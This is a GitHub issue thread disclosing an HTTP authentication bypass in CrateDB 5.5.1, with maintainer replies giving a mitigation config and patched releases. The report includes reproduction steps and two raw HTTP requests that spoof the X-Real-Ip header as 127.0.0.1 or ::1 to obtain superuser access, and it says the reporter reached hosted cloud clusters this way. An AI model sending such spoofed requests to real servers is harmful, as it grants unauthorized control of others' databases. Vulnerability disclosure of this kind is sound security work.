### ISSUE TITLE
There is an HTTP authentication bypass vulnerability in the CrateDB database

### ISSUE THREAD

**Issue by Tu0Laj1** [crate/crate#15231]
### CrateDB version

5.5.1

### CrateDB setup information

number of nodes: 1.
Docker Installed.
Install startup command:
docker pull crate:latest
docker run -d --publish 4200:4200 --publish 5432:5432 crate -Cdiscovery.type=single-node -Cauth.host_based.enabled=true -Cauth.host_based.config.0.method=trust -Cauth.host_based.config.0.address=_local_ -Cauth.host_based.config.0.user=crate -Cauth.host_based.config.99.method=password

### Problem description

There is an authentication bypass vulnerability in the Admin UI component of the CrateDB database. After configuring password authentication and_ Local_ In the case of an address, identity authentication can be bypassed by setting the X-Real IP request header to a specific value and accessing the Admin UI directly using the default user identity.

### Steps to Reproduce

1.start the Docker container of the CrateDB database
docker pull crate:latest
docker run -d --publish 4200:4200 --publish 5432:5432 crate -Cdiscovery.type=single-node -Cauth.host_based.enabled=true -Cauth.host_based.config.0.method=trust -Cauth.host_based.config.0.address=_local_ -Cauth.host_based.config.0.user=crate -Cauth.host_based.config.99.method=password
![image](https://github.com/crate/crate/assets/154296962/c0da13ef-829e-4295-9eac-9b66bc9b4e19)

2.Accessing the CrateDB Admin UI
http://yourip:4200/
At this point, the identity authentication window will prompt you to enter your username and password,due to the default user "crate" not having a password, it is not possible to log in to the Admin UI using the username "crate".
![image](https://github.com/crate/crate/assets/154296962/97f4d322-38dc-4725-8da5-2a8efdecbf3f)

3.Code Audit
In the code file: \crate-master\server\src\main\java\io\crate\auth\HostBasedAuthentication.java,defined that when hbaAddressOrHostname. equals ("_local_"), it can be accessed through the IP address "127.0.0.1" or ":: 1"
![image](https://github.com/crate/crate/assets/154296962/333d9059-6466-40df-8c47-8f13f2c3f377)

4.Bypass identity authentication by setting the X-Real IP request header to "127.0.0.1" or ":: 1"
Request package display, for example:

POST /_sql HTTP/1.1
Host: yourip:4200
Content-Type: application/json;charset=utf-8
X-Real-Ip: 127.0.0.1
Content-Length: 31

{"stmt":"SELECT CURRENT_USER;"}
![image](https://github.com/crate/crate/assets/154296962/64a9ef6d-0ea6-4ba8-8566-e57bacb31650)
or

POST /_sql HTTP/1.1
Host: yourip:4200
Content-Type: application/json;charset=utf-8
X-Real-Ip: ::1
Content-Length: 31

{"stmt":"SELECT CURRENT_USER;"}
![image](https://github.com/crate/crate/assets/154296962/b94f328d-69d3-45b5-95dd-2706b24fc3da)

5.Even worse, https://console.cratedb.cloud/ Also affected by this vulnerability
I can directly access the CrateDB Admin UI on https://*.cratedb.net:4200/as the "crate" super user through this vulnerability. Normally, I should only have the user privileges of "admin"
![image](https://github.com/crate/crate/assets/154296962/a491b91b-47df-4069-8538-06e923cd0389)

### Actual Result

Directly access the CrateDB Admin UI as the default user

### Expected Result

Directly access the CrateDB Admin UI as the default user

**Comment by proddata** [comment]
Thank you for bringing this issue to our attention. We are currently looking into it with urgency.

As a preliminary measure, it's advisable to restrict superuser access to the PostgreSQL protocol.

```
        - -Cauth.host_based.config.0.user=crate
        - -Cauth.host_based.config.0.address=_local_
        - -Cauth.host_based.config.0.method=trust
        - -Cauth.host_based.config.0.protocol=pg
```

Additionally, it is highly recommended for CrateDB Cloud Clusters to use the IP Allow-List feature, effectively blocking access at the TCP level.

Which can be found in the **Cluster** > **Manage** Tab
<img width="1104" alt="image" src="https://github.com/crate/crate/assets/23557193/c2bd698e-df80-417e-a770-acf21fa97a33">

**Comment by seut** [comment]
@Tu0Laj1 
Thank you a lot for reporting. We have fixed this inside CrateDB with https://github.com/crate/crate/pull/15234. 
We will release this fix asap for all current supported releases (`5.2` -> `5.5`).

On CrateDB Cloud, the team took already the necessary actions to mitigate it for all existing clusters, and is working on further improvements to avoid such security risks in the future.

**Comment by seut** [comment]
We have just released CrateDB `5.2.11`, `5.3.8`, `5.4.7` and `5.5.2` which contain the related fix.
